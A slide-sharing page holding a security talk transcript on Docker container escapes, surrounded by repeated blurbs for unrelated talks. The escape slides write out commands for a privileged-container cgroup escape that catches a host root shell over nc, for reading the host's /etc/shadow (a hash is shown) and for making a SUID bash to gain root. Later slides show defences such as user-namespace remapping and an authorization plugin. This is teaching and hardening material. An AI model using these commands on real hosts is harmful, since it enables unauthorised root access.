This session was presented at Global Microsoft 365 Developer Bootcamp, 2020, Hyderabad, India on 17 October, 2020.
Agenda:
- Manage User Identity
- Role Based Access Control (RBAC)
- Principle of least privilege
- Privileged Identity Management (PIM)
- Real world use cases
Docker … Podman are two close but different tools. What are their differences, what are their commonalities? In this presentation, we propose to present the two tools in order to highlight their differences in design and their specificities, their similarities.
The objective is to allow you to know these tools, from their common roots (Cgroup, namespace,...) to their divergence (socket). From ease of use (Socket) to the hassle (proxy), we will address the strengths and weaknesses of each through our uses of them (build, test,...). We will of course mention our friends the CVEs to feed your thoughts on their security.
DCEU 18: Tips and Tricks of the Docker CaptainsDocker, Inc.
Brandon Mitchell - Solutions Architect, BoxBoat
Docker Captain Brandon Mitchell will help you accelerate your adoption of Docker containers by delivering tips and tricks on getting the most out of Docker. Topics include managing disk usage, preventing subnet collisions, debugging container networking, understanding image layers, getting more value out of the default volume driver, and solving the UID/GID permission issues with volumes in a way that allows images to be portable from any developer laptop and to production.
Container: is it safe enough to run you application?Aleksey Zalesov
In this talk I explore technologies that empower containerisation and look at several cases when container was able to break the walls around it. Talk was given at LinuxPiter at Nov 21, 2015
Docker Practice for beginner.
- docker install on ubuntu 18.04 LTS
- docker pull/push
- making docker-compose file which serving spring-boot+ mySql application
This session was presented at Global Microsoft 365 Developer Bootcamp, 2020, Hyderabad, India on 17 October, 2020.
Agenda:
- Manage User Identity
- Role Based Access Control (RBAC)
- Principle of least privilege
- Privileged Identity Management (PIM)
- Real world use cases
Docker … Podman are two close but different tools. What are their differences, what are their commonalities? In this presentation, we propose to present the two tools in order to highlight their differences in design and their specificities, their similarities.
The objective is to allow you to know these tools, from their common roots (Cgroup, namespace,...) to their divergence (socket). From ease of use (Socket) to the hassle (proxy), we will address the strengths and weaknesses of each through our uses of them (build, test,...). We will of course mention our friends the CVEs to feed your thoughts on their security.
DCEU 18: Tips and Tricks of the Docker CaptainsDocker, Inc.
Brandon Mitchell - Solutions Architect, BoxBoat
Docker Captain Brandon Mitchell will help you accelerate your adoption of Docker containers by delivering tips and tricks on getting the most out of Docker. Topics include managing disk usage, preventing subnet collisions, debugging container networking, understanding image layers, getting more value out of the default volume driver, and solving the UID/GID permission issues with volumes in a way that allows images to be portable from any developer laptop and to production.
Container: is it safe enough to run you application?Aleksey Zalesov
In this talk I explore technologies that empower containerisation and look at several cases when container was able to break the walls around it. Talk was given at LinuxPiter at Nov 21, 2015
Docker Practice for beginner.
- docker install on ubuntu 18.04 LTS
- docker pull/push
- making docker-compose file which serving spring-boot+ mySql application
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Matt Batten (sleepZ3R0) spoke at BSIDES AUGUSTA and BSIDES RDU these are our slides. Hope you can learn and benefit from them. If you have any questions feel free to send us messages on twitter we will always respond.
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The detail architecture of the most relevant consumer drones will be introduced, continuing with the communications protocol between the pilot (app in the smartphone or remote controller) and the drone. Manual reverse engineering on the binary protocol used for this communication will lead to identifying and understanding all the commands from each of the drones, and later inject commands back.
Learning Objectives:
1: Understand whenever a protocol between drone and pilot is secure.
2: Learn about a new reverse engineering methodology for these protocols.
3: Review a set of good practices to secure the environment surrounding a drone.
(Source: RSA Conference USA 2018)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Containers from Scratch: what are they made from?Giri Kuncoro
Talk from Docker meetup Jakarta. Presented and demoed various Linux kernel features that enable container runtime, i.e. chroot, namespaces, cgroups, capabilities.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Matt Batten (sleepZ3R0) spoke at BSIDES AUGUSTA and BSIDES RDU these are our slides. Hope you can learn and benefit from them. If you have any questions feel free to send us messages on twitter we will always respond.
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The detail architecture of the most relevant consumer drones will be introduced, continuing with the communications protocol between the pilot (app in the smartphone or remote controller) and the drone. Manual reverse engineering on the binary protocol used for this communication will lead to identifying and understanding all the commands from each of the drones, and later inject commands back.
Learning Objectives:
1: Understand whenever a protocol between drone and pilot is secure.
2: Learn about a new reverse engineering methodology for these protocols.
3: Review a set of good practices to secure the environment surrounding a drone.
(Source: RSA Conference USA 2018)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Containers from Scratch: what are they made from?Giri Kuncoro
Talk from Docker meetup Jakarta. Presented and demoed various Linux kernel features that enable container runtime, i.e. chroot, namespaces, cgroups, capabilities.
Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
9. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Escape Container via Security Misconfigurations
9
10. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Misconfig 1: Running Container with --privileged
$ docker run --rm -it --privileged ubuntu bash
--privileged flag:
When using this flag, containers have full access to all devices and lack
restrictions from seccomp, AppArmor, and Linux capabilities.
10
13. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Misconfig 1: Running Container with --privileged
root@18ea7c42f8f2:/# sleep 2 && sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" &
root@18ea7c42f8f2:/# nc -lvp 9999
listening on [any] 9999 ...
172.17.0.1: inverse host lookup failed: Unknown host
connect to [172.17.0.2] from (UNKNOWN) [172.17.0.1] 33652
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@parrot:/#
13
14. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Misconfig 2: Excessive Capabilities
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined
ubuntu bash
The --cap-add=SYS_ADMIN flag allows a container to perform the mount syscall.
Use the --security-opt apparmor=unconfined flag to start a container without an
AppArmor profile.
*Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount
syscall even when the container is run with SYS_ADMIN.
14
15. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Misconfig 3: Mount Sensitive Volumes #1
dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cat /mnt/host/etc/shadow
root:$6$jvHBn8UTWequ.Rn5$TxgN48QEo7FEWgSvmgrmrXeTMULpmc6EOxSv
h4pliCVwg4Vmd3ODpAz.ICbSz6L3P7RK0lDUP.IVSRckRU9Ss.:18040:0:99999:7
:::
daemon:*:18011:0:99999:7:::
bin:*:18011:0:99999:7:::
[...]
15
16. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Misconfig 3: Mount Sensitive Volumes #1
dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cp /mnt/host/bin/bash /mnt/host/tmp/bashsuid
/ # chmod a+sx /mnt/host/tmp/bashsuid
/ # exit
dev01@parrot:~$ /tmp/bashsuid -p
bashsuid-5.0# id
uid=1002(dev01) gid=1002(dev01) euid=0(root) egid=0(root)
groups=0(root),997(docker),1002(dev01)
16
25. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Low-Privileged Container
25Image source: https://medium.com/@tonistiigi/experimenting-with-rootless-docker-416c9ad8c0d6
26. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Low-Privileged Container
26Image source: https://medium.com/@tonistiigi/experimenting-with-rootless-docker-416c9ad8c0d6
27. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Enable User Namespaces
$ useradd -u 200000 temp-ns-root
$ groupmod -g 200000 temp-ns-root
$ useradd temp-ns
$ cat /etc/passwd | grep temp
temp-ns-root:x:200000:200000::/home/temp-ns-root:/bin/sh
temp-ns:x:1001:1001::/home/temp-ns:/bin/sh
Linux User Namespace
27
https://docs.docker.com/engine/security/userns-remap/
28. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Enable User Namespaces
$ cat /etc/subuid
temp-ns:200000:65536
$ cat /etc/subgid
temp-ns:200000:65536
Linux User Namespace
28
29. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Enable User Namespaces
$ cat /etc/docker/daemon.json
{
"userns-remap": "temp-ns:temp-ns"
}
$ systemctl daemon-reload
$ systemctl restart docker
$ docker info
[...]
Security Options:
userns
Linux User Namespace
29
30. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cat /proc/self/uid_map
0 200000 65536
/ # cat /proc/self/gid_map
0 200000 65536
/ # cat /mnt/host/etc/shadow
cat: can't open '/mnt/host/etc/shadow': Permission denied
/ # touch /mnt/host/tmp/remapped
/ # exit
$ ls -la /tmp/remapped
-rw-r--r-- 1 temp-ns-root temp-ns-root 0 Jan 23 08:42 /tmp/remapped
Linux User Namespace
30
31. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined
-v /usr/bin/nc:/usr/bin/nc ubuntu bash
root@d34335b93113:/# mkdir /tmp/cgrp
root@d34335b93113:/# mount -t cgroup -o rdma cgroup /tmp/cgrp
mount: /tmp/cgrp: permission denied.
Linux User Namespace
31
32. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
$ docker run -it --userns=host -v /:/mnt/host --rm alpine sh
/ # touch /mnt/host/tmp/remapped
/ # exit
$ ls -la /tmp/remapped
-rw-r--r-- 1 root root 0 Jan 23 08:53 /tmp/remapped
Linux User Namespace
32
33. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Linux User Namespace
33
https://github.com/moby/moby/issues/22223
34. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Linux User Namespace
34
https://github.com/moby/moby/issues/22223
35. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
In short, an OS process/service that extends capabilities of Docker Engine.
1. Authorization
- Extend API authorization mechanism
2. Network
- Extend network management - VXLAN, IPVLAN, MACVLAN, ...
3. Volume
- Extend persistent storage - Amazon EBS, ...
4. IPAM
- Extend IP address management - DNS, DHCP, ...
5. Graph
- Extend image and container fs storage
Docker Plugin - What is it?
35
36. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Register Docker plugin by putting itself in a plugin directory:
1. Unix Domain Socket
- /run/docker/plugins/demo.sock
2. URL
- /etc/docker/plugins/demo.spec
- unix:///other.sock
- tcp://localhost:8080
3. JSON Specification
- /etc/docker/plugins/demo.json
Docker Plugin API
36
37. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Docker Plugin - Volume plugin for Amazon EBS
https://docs.docker.com/engine/extend/EBS_volume/
37
38. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Docker Authorization Model (1 - Default)
38
39. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Docker Authorization Model (2 - with AuthZ Plugin)
39
Image source:
https://docs.docker.com/engine/extend/pluginsut_ahorization/
40. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Example with docker-no-trivial-root Plugin
40
https://github.com/ad-freiburg/docker-no-trivial-root
Disabling some trivial ways of gaining root via Docker
41. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Just A Quick Look At The Code
41https://github.com/ad-freiburg/docker-no-trivial-root
42. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Just A Quick Look At The Code
42https://github.com/ad-freiburg/docker-no-trivial-root
43. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
$ ./docker-no-trivial-root &
[1] 11552
$ ls -al /run/docker/plugins/
total 0
drwx------ 2 root root 60 Jan 24 05:13 .
drwx------ 8 root root 180 Jan 23 09:58 ..
srw-rw---- 1 root root 0 Jan 24 05:13 no-trivial-root.sock
Docker Authorization Plugin
43